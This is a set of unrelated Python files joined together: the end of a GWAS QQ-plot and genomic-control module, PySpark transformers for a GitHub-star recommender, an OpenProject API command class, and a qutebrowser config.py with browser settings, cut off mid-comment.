lower=max_exp_qval,
upper=math.ceil(2 * max_exp_qval))
if qvals[0] > max_obs_qval:
for qval in qvals:
if qval <= max_obs_qval:
max_obs_qval = qval
break
occupied_bins = set()
for i, obs_qval in enumerate(qvals):
if obs_qval > max_obs_qval:
continue
exp_qval = -math.log10((i + 0.5) / len(qvals))
exp_bin = int(exp_qval / max_exp_qval * NUM_BINS)
# TODO(pjvh): it'd be great if the `obs_bin`s started right at the lowest qval in that `exp_bin`.
# that way we could have fewer bins but still get a nice straight diagonal line without that
# stair-stepping appearance.
obs_bin = int(obs_qval / max_obs_qval * NUM_BINS)
occupied_bins.add((exp_bin, obs_bin))
bins = []
for exp_bin, obs_bin in occupied_bins:
assert 0 <= exp_bin <= NUM_BINS, exp_bin
assert 0 <= obs_bin <= NUM_BINS, obs_bin
bins.append((
exp_bin / NUM_BINS * max_exp_qval,
obs_bin / NUM_BINS * max_obs_qval
))
return {
'bins': sorted(bins),
'max_exp_qval': max_exp_qval,
}
def gc_value_from_list(qvals, quantile=0.5):
# qvals must be in decreasing order.
assert all(a >= b for a, b in boltons.iterutils.pairwise(qvals))
qval = qvals[int(len(qvals) * quantile)]
pval = 10 ** -qval
return gc_value(pval, quantile)
def gc_value(pval, quantile=0.5):
# This should be equivalent to R: `qchisq(median_pval, df=1, lower.tail=F) / qchisq(quantile, df=1, lower.tail=F)`
return scipy.stats.chi2.ppf(1 - pval, 1) / scipy.stats.chi2.ppf(1 - quantile, 1)
# TODO: These should be moved to unit tests
assert approx_equal(gc_value(0.49), 1.047457) # computed using R code.
assert approx_equal(gc_value(0.5), 1)
assert approx_equal(gc_value(0.50001), 0.9999533)
assert approx_equal(gc_value(0.6123), 0.5645607)
def get_confidence_intervals(num_variants, confidence=0.95):
one_sided_doubt = (1 - confidence) / 2
# `variant_counts` are the numbers of variants at which we'll calculate the confidence intervals
# any `1 <= variant_count <= num_variants-1` could be used, but scale in powers of 2 to make the CI visually smooth
variant_counts = []
for x in range(0, int(math.ceil(math.log2(num_variants)))):
variant_counts.append(2 ** x)
variant_counts.append(num_variants - 1)
variant_counts.reverse()
for variant_count in variant_counts:
rv = scipy.stats.beta(variant_count, num_variants - variant_count)
yield {
'x': round(-math.log10((variant_count - 0.5) / num_variants), 2),
'y_min': round(-math.log10(rv.ppf(1 - one_sided_doubt)), 2),
'y_max': round(-math.log10(rv.ppf(one_sided_doubt)), 2),
}
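
# A minimal usage sketch (hypothetical p-values) tying the pieces together:
# convert p-values to qvals = -log10(p), then bin them for the QQ plot and
# compute the confidence envelope.
if __name__ == "__main__":
    pvals = [0.5, 0.2, 0.05, 0.01, 0.001]
    qvals = sorted((-math.log10(p) for p in pvals), reverse=True)
    print(compute_qq(qvals))
    print(list(get_confidence_intervals(num_variants=len(pvals))))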
| nilq/baby-python | python |
# coding: utf-8
from pyspark import keyword_only
from pyspark.ml import Transformer
from pyspark.ml.param.shared import Param
from pyspark.sql import SparkSession
import pyspark.sql.functions as F
spark = SparkSession.builder.getOrCreate()
class RatingBuilder(Transformer):
def _transform(self, raw_df):
rating_df = raw_df \
.selectExpr('from_user_id AS user', 'repo_id AS item', '1 AS rating', 'starred_at') \
.orderBy('user', F.col('starred_at').desc())
return rating_df
# TODO: no longer compatible with the new database schema; needs fixing
class DataCleaner(Transformer):
@keyword_only
def __init__(self, min_item_stargazers_count=None, max_item_stargazers_count=None, min_user_starred_count=None, max_user_starred_count=None):
super(DataCleaner, self).__init__()
        self.min_item_stargazers_count = Param(self, 'min_item_stargazers_count', 'Remove items whose stargazer count is below this number')
        self.max_item_stargazers_count = Param(self, 'max_item_stargazers_count', 'Remove items whose stargazer count is above this number')
        self.min_user_starred_count = Param(self, 'min_user_starred_count', 'Remove users whose starred repo count is below this number')
        self.max_user_starred_count = Param(self, 'max_user_starred_count', 'Remove users whose starred repo count is above this number')
self._setDefault(min_item_stargazers_count=1, max_item_stargazers_count=50000, min_user_starred_count=1, max_user_starred_count=50000)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, min_item_stargazers_count=None, max_item_stargazers_count=None, min_user_starred_count=None, max_user_starred_count=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def set_min_item_stargazers_count(self, value):
self._paramMap[self.min_item_stargazers_count] = value
return self
def get_min_item_stargazers_count(self):
return self.getOrDefault(self.min_item_stargazers_count)
def set_max_item_stargazers_count(self, value):
self._paramMap[self.max_item_stargazers_count] = value
return self
def get_max_item_stargazers_count(self):
return self.getOrDefault(self.max_item_stargazers_count)
def set_min_user_starred_count(self, value):
self._paramMap[self.min_user_starred_count] = value
return self
def get_min_user_starred_count(self):
return self.getOrDefault(self.min_user_starred_count)
def set_max_user_starred_count(self, value):
self._paramMap[self.max_user_starred_count] = value
return self
def get_max_user_starred_count(self):
return self.getOrDefault(self.max_user_starred_count)
def _transform(self, rating_df):
min_item_stargazers_count = self.get_min_item_stargazers_count()
max_item_stargazers_count = self.get_max_item_stargazers_count()
min_user_starred_count = self.get_min_user_starred_count()
max_user_starred_count = self.get_max_user_starred_count()
to_keep_items_df = rating_df \
.groupBy('item') \
.agg(F.count('user').alias('stargazers_count')) \
.where('stargazers_count >= {0} AND stargazers_count <= {1}'.format(min_item_stargazers_count, max_item_stargazers_count)) \
.orderBy('stargazers_count', ascending=False) \
.select('item', 'stargazers_count')
temp1_df = rating_df.join(to_keep_items_df, 'item', 'inner')
to_keep_users_df = temp1_df \
.groupBy('user') \
.agg(F.count('item').alias('starred_count')) \
.where('starred_count >= {0} AND starred_count <= {1}'.format(min_user_starred_count, max_user_starred_count)) \
.orderBy('starred_count', ascending=False) \
.select('user', 'starred_count')
temp2_df = temp1_df.join(to_keep_users_df, 'user', 'inner')
clean_df = temp2_df.select('user', 'item', 'rating', 'starred_at')
return clean_df
class PredictionProcessor(Transformer):
def _transform(self, predicted_df):
non_null_df = predicted_df.dropna(subset=['prediction', ])
prediction_df = non_null_df.withColumn('prediction', non_null_df['prediction'].cast('double'))
return prediction_df
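
# A minimal local sketch (hypothetical star events; assumes the older PySpark
# API that the @keyword_only pattern above targets):
if __name__ == '__main__':
    raw_df = spark.createDataFrame(
        [(1, 100, '2017-01-01'), (1, 101, '2017-01-02'), (2, 100, '2017-01-03')],
        ['from_user_id', 'repo_id', 'starred_at'])
    rating_df = RatingBuilder().transform(raw_df)
    DataCleaner(min_item_stargazers_count=2).transform(rating_df).show()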
| nilq/baby-python | python |
import json
from pyopenproject.api_connection.exceptions.request_exception import RequestError
from pyopenproject.api_connection.requests.post_request import PostRequest
from pyopenproject.business.exception.business_error import BusinessError
from pyopenproject.business.services.command.work_package.work_package_command import WorkPackageCommand
from pyopenproject.model.form import Form
class CreateRelationForm(WorkPackageCommand):
def __init__(self, connection, work_package, relation):
super().__init__(connection)
self.work_package = work_package
self.relation = relation
def execute(self):
try:
json_obj = PostRequest(connection=self.connection,
context=f"{self.CONTEXT}/{self.work_package.id}/form",
json=json.dumps(self.relation.__dict__)).execute()
return Form(json_obj)
except RequestError as re:
raise BusinessError(f"Error creating relation for work package {self.work_package.id}") from re
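
# For illustration (hypothetical objects): given an established `connection`,
# a `work_package` with a valid id and a `relation` payload, the form is
# obtained with:
#     form = CreateRelationForm(connection, work_package, relation).execute()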
| nilq/baby-python | python |
# qutebrowser config.py
#
# NOTE: config.py is intended for advanced users who are comfortable
# with manually migrating the config file on qutebrowser upgrades. If
# you prefer, you can also configure qutebrowser using the
# :set/:bind/:config-* commands without having to write a config.py
# file.
#
# Documentation:
# qute://help/configuring.html
# qute://help/settings.html
# Uncomment this to still load settings configured via autoconfig.yml
# config.load_autoconfig()
# Aliases for commands. The keys of the given dictionary are the
# aliases, while the values are the commands they map to.
# Type: Dict
c.aliases = {
'wq' : 'quit --save',
'w' : 'session-save',
'q' : 'quit',
'pe' : 'set content.proxy http://localhost:8080',
'pd' : 'set content.proxy system',
'mpv' : 'spawn --userscript mpv'
}
# Require a confirmation before quitting the application.
# Type: ConfirmQuit
# Valid values:
# - always: Always show a confirmation.
# - multiple-tabs: Show a confirmation if multiple tabs are opened.
# - downloads: Show a confirmation if downloads are running
# - never: Never show a confirmation.
c.confirm_quit = ['never']
# Maximum time (in minutes) between two history items for them to be
# considered being from the same browsing session. Items with less time
# between them are grouped when being displayed in `:history`. Use -1 to
# disable separation.
# Type: Int
c.history_gap_interval = 30
# When to find text on a page case-insensitively.
# Type: IgnoreCase
# Valid values:
# - always: Search case-insensitively.
# - never: Search case-sensitively.
# - smart: Search case-sensitively if there are capital characters.
c.search.ignore_case = 'smart'
# Find text on a page incrementally, renewing the search for each typed
# character.
# Type: Bool
c.search.incremental = True
# How to open links in an existing instance if a new one is launched.
# This happens when e.g. opening a link from a terminal. See
# `new_instance_open_target_window` to customize in which window the
# link is opened in.
# Type: String
# Valid values:
# - tab: Open a new tab in the existing window and activate the window.
# - tab-bg: Open a new background tab in the existing window and activate the window.
# - tab-silent: Open a new tab in the existing window without activating the window.
# - tab-bg-silent: Open a new background tab in the existing window without activating the window.
# - window: Open in a new window.
c.new_instance_open_target = 'tab'
# Which window to choose when opening links as new tabs. When
# `new_instance_open_target` is set to `window`, this is ignored.
# Type: String
# Valid values:
# - first-opened: Open new tabs in the first (oldest) opened window.
# - last-opened: Open new tabs in the last (newest) opened window.
# - last-focused: Open new tabs in the most recently focused window.
# - last-visible: Open new tabs in the most recently visible window.
c.new_instance_open_target_window = 'last-focused'
# Name of the session to save by default. If this is set to null, the
# session which was last loaded is saved.
# Type: SessionName
c.session.default_name = None
# Load a restored tab as soon as it takes focus.
# Type: Bool
c.session.lazy_restore = False
# Backend to use to display websites. qutebrowser supports two different
# web rendering engines / backends, QtWebKit and QtWebEngine. QtWebKit
# was discontinued by the Qt project with Qt 5.6, but picked up as a
# well maintained fork: https://github.com/annulen/webkit/wiki -
# qutebrowser only supports the fork. QtWebEngine is Qt's official
# successor to QtWebKit. It's slightly more resource hungry than
# QtWebKit and has a couple of missing features in qutebrowser, but is
# generally the preferred choice.
# Type: String
# Valid values:
# - webengine: Use QtWebEngine (based on Chromium).
# - webkit: Use QtWebKit (based on WebKit, similar to Safari).
c.backend = 'webengine'
# Time interval (in milliseconds) between auto-saves of
# config/cookies/etc.
# Type: Int
c.auto_save.interval = 15000
# Always restore open sites when qutebrowser is reopened.
# Type: Bool
c.auto_save.session = False
# Automatically start playing `<video>` elements. Note: On Qt < 5.11,
# this option needs a restart and does not support URL patterns.
# Type: Bool
c.content.autoplay = True
# Size (in bytes) of the HTTP network cache. Null to use the default
# value. With QtWebEngine, the maximum supported value is 2147483647 (~2
# GB).
# Type: Int
c.content.cache.size = None
# Allow websites to read canvas elements. Note this is needed for some
# websites to work properly.
# Type: Bool
c.content.canvas_reading = True
# Which cookies to accept. With QtWebEngine, this setting also controls
# other features with tracking capabilities similar to those of cookies;
# including IndexedDB, DOM storage, filesystem API, service workers, and
# AppCache. Note that with QtWebKit, only `all` and `never` are
# supported as per-domain values. Setting `no-3rdparty` or `no-
# unknown-3rdparty` per-domain on QtWebKit will have the same effect as
# `all`. If this setting is used with URL patterns, the pattern gets
# applied to the origin/first party URL of the page making the request,
# not the request URL.
# Type: String
# Valid values:
# - all: Accept all cookies.
# - no-3rdparty: Accept cookies from the same origin only. This is known to break some sites, such as GMail.
# - no-unknown-3rdparty: Accept cookies from the same origin only, unless a cookie is already set for the domain. On QtWebEngine, this is the same as no-3rdparty.
# - never: Don't accept cookies at all.
config.set('content.cookies.accept', 'all', 'chrome-devtools://*')
# Which cookies to accept (same documentation as above).
config.set('content.cookies.accept', 'all', 'devtools://*')
# Which cookies to accept (same documentation as above).
c.content.cookies.accept = 'no-3rdparty'
# Store cookies. Note this option needs a restart with QtWebEngine on Qt
# < 5.9.
# Type: Bool
c.content.cookies.store = True
# Default encoding to use for websites. The encoding must be a string
# describing an encoding such as _utf-8_, _iso-8859-1_, etc.
# Type: String
c.content.default_encoding = 'utf-8'
# Limit fullscreen to the browser window (does not expand to fill the
# screen).
# Type: Bool
c.content.fullscreen.window = False
# Allow websites to share screen content. On Qt < 5.10, a dialog box is
# always displayed, even if this is set to "true".
# Type: BoolAsk
# Valid values:
# - true
# - false
# - ask
c.content.desktop_capture = 'ask'
# Try to pre-fetch DNS entries to speed up browsing.
# Type: Bool
c.content.dns_prefetch = True
# Allow websites to request geolocations.
# Type: BoolAsk
# Valid values:
# - true
# - false
# - ask
c.content.geolocation = 'ask'
# Value to send in the `Accept-Language` header. Note that the value
# read from JavaScript is always the global value.
# Type: String
c.content.headers.accept_language = 'en-US,en'
# Custom headers for qutebrowser HTTP requests.
# Type: Dict
c.content.headers.custom = {}
# Value to send in the `DNT` header. When this is set to true,
# qutebrowser asks websites to not track your identity. If set to null,
# the DNT header is not sent at all.
# Type: Bool
c.content.headers.do_not_track = True
# When to send the Referer header. The Referer header tells websites
# from which website you were coming from when visiting them. No restart
# is needed with QtWebKit.
# Type: String
# Valid values:
# - always: Always send the Referer.
# - never: Never send the Referer. This is not recommended, as some sites may break.
# - same-domain: Only send the Referer for the same domain. This will still protect your privacy, but shouldn't break any sites. With QtWebEngine, the referer will still be sent for other domains, but with stripped path information.
c.content.headers.referer = 'same-domain'
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}) AppleWebKit/{webkit_version} (KHTML, like Gecko) {upstream_browser_key}/{upstream_browser_version} Safari/{webkit_version}', 'https://web.whatsapp.com/')
# User agent to send (same documentation as above).
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}; rv:71.0) Gecko/20100101 Firefox/71.0', 'https://accounts.google.com/*')
# User agent to send (same documentation as above).
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99 Safari/537.36', 'https://*.slack.com/*')
# User agent to send (same documentation as above).
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}; rv:71.0) Gecko/20100101 Firefox/71.0', 'https://docs.google.com/*')
# User agent to send (same documentation as above).
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}; rv:71.0) Gecko/20100101 Firefox/71.0', 'https://drive.google.com/*')
# Enable host blocking.
# Type: Bool
c.content.host_blocking.enabled = True
# List of URLs of lists which contain hosts to block. The file can be
# in one of the following formats: - An `/etc/hosts`-like file - One
# host per line - A zip-file of any of the above, with either only one
# file, or a file named `hosts` (with any extension). It's also
# possible to add a local file or directory via a `file://` URL. In case
# of a directory, all files in the directory are read as adblock lists.
# The file `~/.config/qutebrowser/blocked-hosts` is always read if it
# exists.
# Type: List of Url
c.content.host_blocking.lists = ['https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts']
# A list of patterns that should always be loaded, despite being ad-
# blocked. Note this whitelists blocked hosts, not first-party URLs. As
# an example, if `example.org` loads an ad from `ads.example.org`, the
# whitelisted host should be `ads.example.org`. If you want to disable
# the adblocker on a given page, use the `content.host_blocking.enabled`
# setting with a URL pattern instead. Local domains are always exempt
# from hostblocking.
# Type: List of UrlPattern
c.content.host_blocking.whitelist = ['piwik.org']
# Enable hyperlink auditing (`<a ping>`).
# Type: Bool
c.content.hyperlink_auditing = False
# Load images automatically in web pages.
# Type: Bool
config.set('content.images', True, 'chrome-devtools://*')
config.set('content.images', True, 'devtools://*')
c.content.images = True
# Show javascript alerts.
# Type: Bool
c.content.javascript.alert = True
# Allow JavaScript to read from or write to the clipboard. With
# QtWebEngine, writing the clipboard as response to a user interaction
# is always allowed.
# Type: Bool
c.content.javascript.can_access_clipboard = False
# Allow JavaScript to open new tabs without user interaction.
# Type: Bool
c.content.javascript.can_open_tabs_automatically = False
# Enable JavaScript.
# Type: Bool
config.set('content.javascript.enabled', True, 'chrome-devtools://*')
config.set('content.javascript.enabled', True, 'devtools://*')
config.set('content.javascript.enabled', True, 'chrome://*/*')
config.set('content.javascript.enabled', True, 'qute://*/*')
c.content.javascript.enabled = True
# Log levels to use for JavaScript console logging messages. When a
# JavaScript message with the level given in the dictionary key is
# logged, the corresponding dictionary value selects the qutebrowser
# logger to use. On QtWebKit, the "unknown" setting is always used. The
# following levels are valid: `none`, `debug`, `info`, `warning`,
# `error`.
# Type: Dict
c.content.javascript.log = {'error': 'debug', 'warning': 'debug', 'unknown': 'debug', 'info': 'debug'}
# Use the standard JavaScript modal dialog for `alert()` and
# `confirm()`.
# Type: Bool
c.content.javascript.modal_dialog = False
# Show javascript prompts.
# Type: Bool
c.content.javascript.prompt = True
# Allow locally loaded documents to access remote URLs.
# Type: Bool
c.content.local_content_can_access_remote_urls = False
# Allow locally loaded documents to access other local URLs.
# Type: Bool
c.content.local_content_can_access_file_urls = True
# Enable support for HTML 5 local storage and Web SQL.
# Type: Bool
c.content.local_storage = True
# Netrc-file for HTTP authentication. If unset, `~/.netrc` is used.
# Type: File
c.content.netrc_file = None
# Allow pdf.js to view PDF files in the browser. Note that the files can
# still be downloaded by clicking the download button in the pdf.js
# viewer.
# Type: Bool
c.content.pdfjs = True
# Allow websites to request persistent storage quota via
# `navigator.webkitPersistentStorage.requestQuota`.
# Type: BoolAsk
# Valid values:
# - true
# - false
# - ask
c.content.persistent_storage = 'ask'
# Enable plugins in Web pages.
# Type: Bool
c.content.plugins = True
# Draw the background color and images also when the page is printed.
# Type: Bool
c.content.print_element_backgrounds = True
# Open new windows in private browsing mode which does not record
# visited pages.
# Type: Bool
c.content.private_browsing = False
# Proxy to use. In addition to the listed values, you can use a
# `socks://...` or `http://...` URL. Note that with QtWebEngine, it will
# take a couple of seconds until the change is applied, if this value is
# changed at runtime.
# Type: Proxy
# Valid values:
# - system: Use the system wide proxy.
# - none: Don't use any proxy
c.content.proxy = 'system'
# Validate SSL handshakes.
# Type: BoolAsk
# Valid values:
# - true
# - false
# - ask
c.content.ssl_strict = 'ask'
# List of user stylesheet filenames to use.
# Type: List of File, or File
c.content.user_stylesheets = []
# Enable WebGL.
# Type: Bool
c.content.webgl = True
# Monitor load requests for cross-site scripting attempts. Suspicious
# scripts will be blocked and reported in the devtools JavaScript
# console. Note that bypasses for the XSS auditor are widely known and
# it can be abused for cross-site info leaks in some scenarios, see:
# https://www.chromium.org/developers/design-documents/xss-auditor
# Type: Bool
c.content.xss_auditing = True
# Height (in pixels or as percentage of the window) of the completion.
# Type: PercOrInt
c.completion.height = '25%'
# Move on to the next part when there's only one possible completion
# left.
# Type: Bool
c.completion.quick = True
# When to show the autocompletion window.
# Type: String
# Valid values:
# - always: Whenever a completion is available.
# - auto: Whenever a completion is requested.
# - never: Never.
c.completion.show = 'always'
# Shrink the completion to be smaller than the configured size if there
# are no scrollbars.
# Type: Bool
c.completion.shrink = True
# Width (in pixels) of the scrollbar in the completion window.
# Type: Int
c.completion.scrollbar.width = 12
# Padding (in pixels) of the scrollbar handle in the completion window.
# Type: Int
c.completion.scrollbar.padding = 2
# Format of timestamps (e.g. for the history completion). See
# https://sqlite.org/lang_datefunc.html for allowed substitutions.
# Type: String
c.completion.timestamp_format = '%d/%m'
# Delay (in milliseconds) before updating completions after typing a
# character.
# Type: Int
c.completion.delay = 0
# Minimum amount of characters needed to update completions.
# Type: Int
c.completion.min_chars = 1
# Execute the best-matching command on a partial match.
# Type: Bool
c.completion.use_best_match = False
# Directory to save downloads to. If unset, a sensible OS-specific
# default is used.
# Type: Directory
c.downloads.location.directory = '/home/jagreen/dld'
# Prompt the user for the download location. If set to false,
# `downloads.location.directory` will be used.
# Type: Bool
c.downloads.location.prompt = False
# Remember the last used download directory.
# Type: Bool
c.downloads.location.remember = True
# What to display in the download filename input.
# Type: String
# Valid values:
# - path: Show only the download path.
# - filename: Show only download filename.
# - both: Show download path and filename.
c.downloads.location.suggestion = 'path'
# Default program used to open downloads. If null, the default internal
# handler is used. Any `{}` in the string will be expanded to the
# filename, else the filename will be appended.
# Type: String
c.downloads.open_dispatcher = None
# Where to show the downloaded files.
# Type: VerticalPosition
# Valid values:
# - top
# - bottom
c.downloads.position = 'top'
# Duration (in milliseconds) to wait before removing finished downloads.
# If set to -1, downloads are never removed.
# Type: Int
c.downloads.remove_finished = 50
# Editor (and arguments) to use for the `open-editor` command. The
# following placeholders are defined: * `{file}`: Filename of the file
# to be edited. * `{line}`: Line in which the caret is found in the
# text. * `{column}`: Column in which the caret is found in the text. *
# `{line0}`: Same as `{line}`, but starting from index 0. * `{column0}`:
# Same as `{column}`, but starting from index 0.
# Type: ShellCommand
c.editor.command = ['nvim', '{file}']
# Encoding to use for the editor.
# Type: Encoding
c.editor.encoding = 'utf-8'
# When a hint can be automatically followed without pressing Enter.
# Type: String
# Valid values:
# - always: Auto-follow whenever there is only a single hint on a page.
# - unique-match: Auto-follow whenever there is a unique non-empty match in either the hint string (word mode) or filter (number mode).
# - full-match: Follow the hint when the user typed the whole hint (letter, word or number mode) or the element's text (only in number mode).
# - never: The user will always need to press Enter to follow a hint.
c.hints.auto_follow = 'unique-match'
# Duration (in milliseconds) to ignore normal-mode key bindings after a
# successful auto-follow.
# Type: Int
c.hints.auto_follow_timeout = 0
# CSS border value for hints.
# Type: String
c.hints.border = '1px solid #dadada'
# Characters used for hint strings.
# Type: UniqueCharString
c.hints.chars = 'asdfghjkl'
# Dictionary file to be used by the word hints.
# Type: File
c.hints.dictionary = '/usr/share/dict/words'
# Hide unmatched hints in rapid mode.
# Type: Bool
c.hints.hide_unmatched_rapid_hints = True
# Minimum number of characters used for hint strings.
# Type: Int
c.hints.min_chars = 1
# Mode to use for hints.
# Type: String
# Valid values:
# - number: Use numeric hints. (In this mode you can also type letters from the hinted element to filter and reduce the number of elements that are hinted.)
# - letter: Use the characters in the `hints.chars` setting.
# - word: Use hints words based on the html elements and the extra words.
c.hints.mode = 'letter'
# Comma-separated list of regular expressions to use for 'next' links.
# Type: List of Regex
c.hints.next_regexes = ['\\bnext\\b', '\\bmore\\b', '\\bnewer\\b', '\\b[>→≫]\\b', '\\b(>>|»)\\b', '\\bcontinue\\b']
# Comma-separated list of regular expressions to use for 'prev' links.
# Type: List of Regex
c.hints.prev_regexes = ['\\bprev(ious)?\\b', '\\bback\\b', '\\bolder\\b', '\\b[<←≪]\\b', '\\b(<<|«)\\b']
# Scatter hint key chains (like Vimium) or not (like dwb). Ignored for
# number hints.
# Type: Bool
c.hints.scatter = True
# Make characters in hint strings uppercase.
# Type: Bool
c.hints.uppercase = False
# Allow Escape to quit the crash reporter.
# Type: Bool
c.input.escape_quits_reporter = True
# Automatically enter insert mode if an editable element is focused
# after loading the page.
# Type: Bool
c.input.insert_mode.auto_load = True
# Enter insert mode if an editable element is clicked.
# Type: Bool
c.input.insert_mode.auto_enter = True
# Leave insert mode if a non-editable element is clicked.
# Type: Bool
c.input.insert_mode.auto_leave = True
# Switch to insert mode when clicking flash and other plugins.
# Type: Bool
c.input.insert_mode.plugins = False
# Include hyperlinks in the keyboard focus chain when tabbing.
# Type: Bool
c.input.links_included_in_focus_chain = True
# Timeout (in milliseconds) for partially typed key bindings. If the
# current input forms only partial matches, the keystring will be
# cleared after this time.
# Type: Int
c.input.partial_timeout = 5000
# Enable spatial navigation. Spatial navigation consists in the ability
# to navigate between focusable elements in a Web page, such as
# hyperlinks and form controls, by using Left, Right, Up and Down arrow
# keys. For example, if the user presses the Right key, heuristics
# determine whether there is an element he might be trying to reach
# towards the right and which element he probably wants.
# Type: Bool
c.input.spatial_navigation = False
# Rounding radius (in pixels) for the edges of the keyhint dialog.
# Type: Int
c.keyhint.radius = 6
# Time (in milliseconds) from pressing a key to seeing the keyhint
# dialog.
# Type: Int
c.keyhint.delay = 500
# Duration (in milliseconds) to show messages in the statusbar for. Set
# to 0 to never clear messages.
# Type: Int
c.messages.timeout = 5000
# Show a filebrowser in download prompts.
# Type: Bool
c.prompt.filebrowser = True
# Rounding radius (in pixels) for the edges of prompts.
# Type: Int
c.prompt.radius = 8
# Enable smooth scrolling for web pages. Note smooth scrolling does not
# work with the `:scroll-px` command.
# Type: Bool
c.scrolling.smooth = True
# Languages to use for spell checking. You can check for available
# languages and install dictionaries using scripts/dictcli.py. Run the
# script with -h/--help for instructions.
# Type: List of String
# Valid values:
# - af-ZA: Afrikaans (South Africa)
# - bg-BG: Bulgarian (Bulgaria)
# - ca-ES: Catalan (Spain)
# - cs-CZ: Czech (Czech Republic)
# - da-DK: Danish (Denmark)
# - de-DE: German (Germany)
# - el-GR: Greek (Greece)
# - en-AU: English (Australia)
# - en-CA: English (Canada)
# - en-GB: English (United Kingdom)
# - en-US: English (United States)
# - es-ES: Spanish (Spain)
# - et-EE: Estonian (Estonia)
# - fa-IR: Farsi (Iran)
# - fo-FO: Faroese (Faroe Islands)
# - fr-FR: French (France)
# - he-IL: Hebrew (Israel)
# - hi-IN: Hindi (India)
# - hr-HR: Croatian (Croatia)
# - hu-HU: Hungarian (Hungary)
# - id-ID: Indonesian (Indonesia)
# - it-IT: Italian (Italy)
# - ko: Korean
# - lt-LT: Lithuanian (Lithuania)
# - lv-LV: Latvian (Latvia)
# - nb-NO: Norwegian (Norway)
# - nl-NL: Dutch (Netherlands)
# - pl-PL: Polish (Poland)
# - pt-BR: Portuguese (Brazil)
# - pt-PT: Portuguese (Portugal)
# - ro-RO: Romanian (Romania)
# - ru-RU: Russian (Russia)
# - sh: Serbo-Croatian
# - sk-SK: Slovak (Slovakia)
# - sl-SI: Slovenian (Slovenia)
# - sq: Albanian
# - sr: Serbian
# - sv-SE: Swedish (Sweden)
# - ta-IN: Tamil (India)
# - tg-TG: Tajik (Tajikistan)
# - tr-TR: Turkish (Turkey)
# - uk-UA: Ukrainian (Ukraine)
# - vi-VN: Vietnamese (Viet Nam)
c.spellcheck.languages = ['en-GB']
# Padding (in pixels) for the statusbar.
# Type: Padding
c.statusbar.padding = {'top': 1, 'left': 0, 'bottom': 1, 'right': 0}
# Position of the status bar.
# Type: VerticalPosition
# Valid values:
# - top
# - bottom
c.statusbar.position = 'bottom'
# List of widgets displayed in the statusbar.
# Type: List of String
# Valid values:
# - url: Current page URL.
# - scroll: Percentage of the current page position like `10%`.
# - scroll_raw: Raw percentage of the current page position like `10`.
# - history: Display an arrow when possible to go back/forward in history.
# - tabs: Current active tab, e.g. `2`.
# - keypress: Display pressed keys when composing a vi command.
# - progress: Progress bar for the current page loading.
c.statusbar.widgets = ['keypress', 'url', 'scroll', 'history', 'tabs', 'progress']
# Open new tabs (middleclick/ctrl+click) in the background.
# Type: Bool
c.tabs.background = True
# Mouse button with which to close tabs.
# Type: String
# Valid values:
# - right: Close tabs on right-click.
# - middle: Close tabs on middle-click.
# - none: Don't close tabs using the mouse.
c.tabs.close_mouse_button = 'middle'
# How to behave when the close mouse button is pressed on the tab bar.
# Type: String
# Valid values:
# - new-tab: Open a new tab.
# - close-current: Close the current tab.
# - close-last: Close the last tab.
# - ignore: Don't do anything.
c.tabs.close_mouse_button_on_bar = 'new-tab'
# Scaling factor for favicons in the tab bar. The tab size is unchanged,
# so big favicons also require extra `tabs.padding`.
# Type: Float
c.tabs.favicons.scale = 1.0
# When to show favicons in the tab bar.
# Type: String
# Valid values:
# - always: Always show favicons.
# - never: Always hide favicons.
# - pinned: Show favicons only on pinned tabs.
c.tabs.favicons.show = 'never'
# How to behave when the last tab is closed.
# Type: String
# Valid values:
# - ignore: Don't do anything.
# - blank: Load a blank page.
# - startpage: Load the start page.
# - default-page: Load the default page.
# - close: Close the window.
c.tabs.last_close = 'startpage'
# Switch between tabs using the mouse wheel.
# Type: Bool
c.tabs.mousewheel_switching = True
# Position of new tabs opened from another tab. See
# `tabs.new_position.stacking` for controlling stacking behavior.
# Type: NewTabPosition
# Valid values:
# - prev: Before the current tab.
# - next: After the current tab.
# - first: At the beginning.
# - last: At the end.
c.tabs.new_position.related = 'next'
# Position of new tabs which are not opened from another tab. See
# `tabs.new_position.stacking` for controlling stacking behavior.
# Type: NewTabPosition
# Valid values:
# - prev: Before the current tab.
# - next: After the current tab.
# - first: At the beginning.
# - last: At the end.
c.tabs.new_position.unrelated = 'last'
# Padding (in pixels) around text for tabs.
# Type: Padding
c.tabs.padding = {'top': 0, 'left': 5, 'bottom': 0, 'right': 5}
# When switching tabs, what input mode is applied.
# Type: String
# Valid values:
# - persist: Retain the current mode.
# - restore: Restore previously saved mode.
# - normal: Always revert to normal mode.
c.tabs.mode_on_change = 'normal'
# Position of the tab bar.
# Type: Position
# Valid values:
# - top
# - bottom
# - left
# - right
c.tabs.position = 'top'
# Which tab to select when the focused tab is removed.
# Type: SelectOnRemove
# Valid values:
# - prev: Select the tab which came before the closed one (left in horizontal, above in vertical).
# - next: Select the tab which came after the closed one (right in horizontal, below in vertical).
# - last-used: Select the previously selected tab.
c.tabs.select_on_remove = 'next'
# When to show the tab bar.
# Type: String
# Valid values:
# - always: Always show the tab bar.
# - never: Always hide the tab bar.
# - multiple: Hide the tab bar if only one tab is open.
# - switching: Show the tab bar when switching tabs.
c.tabs.show = 'always'
# Alignment of the text inside of tabs.
# Type: TextAlignment
# Valid values:
# - left
# - right
# - center
c.tabs.title.alignment = 'left'
# Format to use for the tab title for pinned tabs. The same placeholders
